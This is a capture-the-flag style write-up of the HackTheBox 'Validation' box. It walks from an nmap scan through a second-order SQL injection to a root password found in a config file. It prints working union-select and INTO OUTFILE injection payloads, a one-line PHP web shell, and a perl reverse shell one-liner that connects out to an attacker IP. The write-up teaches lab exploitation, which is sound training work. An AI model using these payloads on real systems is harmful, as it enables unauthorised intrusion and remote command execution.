Validation
An easy Linux box from HackTheBox, using a second order SQLi for initial access, and then finding a password in a config file for root.
Validation
Recon
Usual nmap
nmap -sC -sV -oA nmap/validation 10.10.11.116
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-10 13:22 EDT
Nmap scan report for 10.10.11.116
Host is up (0.016s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_ 256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.48 (Debian)
5000/tcp filtered upnp
5001/tcp filtered commplex-link
5002/tcp filtered rfe
5003/tcp filtered filemaker
5004/tcp filtered avt-profile-1
8080/tcp open http nginx
|_http-title: 502 Bad Gateway
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Looking at the http port, see a registration page
When you submit the form, the request looks like
POST / HTTP/1.1
Host: 10.10.11.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://10.10.11.116
Connection: close
Referer: http://10.10.11.116/
Cookie: user=5e11f49b0320731e0898a5a4a676ada8
Upgrade-Insecure-Requests: 1
username=aaa&country=Brazil
Running sqlmap on the request doesn’t give me anything, and if I try to register with a normal ’ injection it works fine
However, when sending a request to /account.php with my registration cookie, it returns an error - demonstrating some kind of second order SQL injection
</b>: Uncaught Error: Call to a member function fetch_assoc() on bool in /var/www/html/account.php:33
Stack trace:
#0 {main}
thrown in <b>/var/www/html/account.php</b>
Exploitation
Lets try to dump the database, but first, we can find out what the user is with
username=123a&country=Brazil' union select user();-- -
Within the registration request, then when we try to go to /account.php, see that the user is
<li class='text-white'>
uhc@localhost
</li>
Now can try to dump the database - but first need to know what it is called by injecting
username=ghfj&country=Brazil' union select database();-- -
It returns that the database is called “registration”, fair enough
Using
' union select schema_name from information_schema.schemata;-- -
To enumerate the other databases
There are 3 other databases, but they are MySQL defaults, information_schema, performance_schema, and mysql
Now we can enumerate the columns with
' union select column_name from information_schema.columns where table_name = 'registration';-- -
And it returns that the database has 4 columns, username, userhash, country and regtime - no passwords
Here we can check what priveleges the our user has with
' union select privilege_type FROM information_schema.user_privileges where grantee = "'uhc'@'localhost'";-- -
And in the long list, can see that we have access to the FILE command, being able to write to files
With a POC can use
' union select "gg" into outfile '/var/www/html/gg.txt';-- -
And can see it when you navigate to 10.10.11.116/gg.txt
Now we can upload a php webshell shell, using this one https://leons.im/posts/single-line-web-shell/, and putting it into wshell.php at webroot
<?php echo passthru($_GET['cmd']); ?>
Now have a webshell, can raise it to a full shell checking for commands with which, no python, but it does have perl
perl -e 'use Socket;$i="10.10.14.6";$p=9001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
With a reverse shell, find a password in the config.php file
uhc-9qual-global-pw
Which is the password to root